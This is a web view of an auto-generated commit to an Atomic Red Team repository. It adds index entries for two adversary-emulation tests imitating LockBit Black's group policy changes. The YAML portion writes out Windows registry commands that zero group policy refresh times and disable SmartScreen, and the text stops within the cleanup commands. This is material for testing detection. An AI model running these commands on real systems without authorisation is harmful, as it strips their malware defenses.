security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-08-03 15:15:40 +00:00
parent f58ca7f524
commit 11a0211a1d
10 changed files with 233 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+4
View File
@@ -214,6 +214,8 @@ defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Setting
defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1574.008,Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1484.001,Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
@@ -483,6 +485,8 @@ privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1574.008,Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
214 defense-evasion T1112 Modify Registry 43 DisallowRun Execution Of Certain Application 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
215 defense-evasion T1574.008 Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
216 defense-evasion T1027.001 Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
217 defense-evasion T1484.001 Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
218 defense-evasion T1484.001 Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
219 defense-evasion T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
220 defense-evasion T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
221 defense-evasion T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
485 privilege-escalation T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
486 privilege-escalation T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
487 privilege-escalation T1574.008 Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
488 privilege-escalation T1484.001 Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
489 privilege-escalation T1484.001 Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
490 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
491 privilege-escalation T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
492 privilege-escalation T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+4
View File
@@ -159,6 +159,8 @@ defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection Histo
defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1574.008,Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1484.001,Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
@@ -356,6 +358,8 @@ privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4
privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.008,Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
159 defense-evasion T1112 Modify Registry 42 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
160 defense-evasion T1112 Modify Registry 43 DisallowRun Execution Of Certain Application 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
161 defense-evasion T1574.008 Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
162 defense-evasion T1484.001 Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
163 defense-evasion T1484.001 Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
164 defense-evasion T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
165 defense-evasion T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
166 defense-evasion T1070.001 Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
358 privilege-escalation T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
359 privilege-escalation T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
360 privilege-escalation T1574.008 Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
361 privilege-escalation T1484.001 Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
362 privilege-escalation T1484.001 Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
363 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
364 privilege-escalation T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
365 privilege-escalation T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
atomics/Indexes/Indexes-Markdown/index.md
+6 -2
View File
@@ -292,7 +292,9 @@
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.001 Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
@@ -744,7 +746,9 @@
- Atomic Test #1: Launch Daemon [macos]
- [T1574.008 Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.001 Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
atomics/Indexes/Indexes-Markdown/windows-index.md
+6 -2
View File
@@ -219,7 +219,9 @@
- [T1574.008 Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1027.001 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.001 Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
@@ -557,7 +559,9 @@
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.008 Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.001 Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
atomics/Indexes/Matrices/matrix.md
+2 -2
View File
@@ -43,7 +43,7 @@
| | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Bash History](../../T1552.003/T1552.003.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery](../../T1518/T1518.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Msiexec](../../T1218.007/T1218.007.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Group Policy Modification](../../T1484.001/T1484.001.md) | [Msiexec](../../T1218.007/T1218.007.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Port Monitors](../../T1547.010/T1547.010.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Time Discovery](../../T1124/T1124.md) | | | | [Internal Proxy](../../T1090.001/T1090.001.md) | |
| | [Python](../../T1059.006/T1059.006.md) | [Login Hook](../../T1037.002/T1037.002.md) | [Time Providers](../../T1547.003/T1547.003.md) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
@@ -78,7 +78,7 @@
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Accessibility Features](../../T1546.008/T1546.008.md) | [Systemd Timers](../../T1053.006/T1053.006.md) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/Matrices/windows-matrix.md
+2 -2
View File
@@ -33,7 +33,7 @@
| | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Query Registry](../../T1012/T1012.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [Port Monitors](../../T1547.010/T1547.010.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Msiexec](../../T1218.007/T1218.007.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Credential API Hooking](../../T1056.004/T1056.004.md) | | [Encrypted Channel](../../T1573/T1573.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Modification](../../T1484.001/T1484.001.md) | [Clear Command History](../../T1070.003/T1070.003.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
| | [At](../../T1053.002/T1053.002.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
@@ -60,7 +60,7 @@
| | | [Accessibility Features](../../T1546.008/T1546.008.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/index.yaml
+106 -2
View File
@@ -11201,7 +11201,59 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- User
atomic_tests: []
identifier: T1484.001
atomic_tests:
- name: LockBit Black - Modify Group policy settings -cmd
auto_generated_guid: 9ab80952-74ee-43da-a98c-1e740a985f28
description: 'An adversary can modify the group policy settings.
'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f
cleanup_command: |
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /f >nul 2>&1
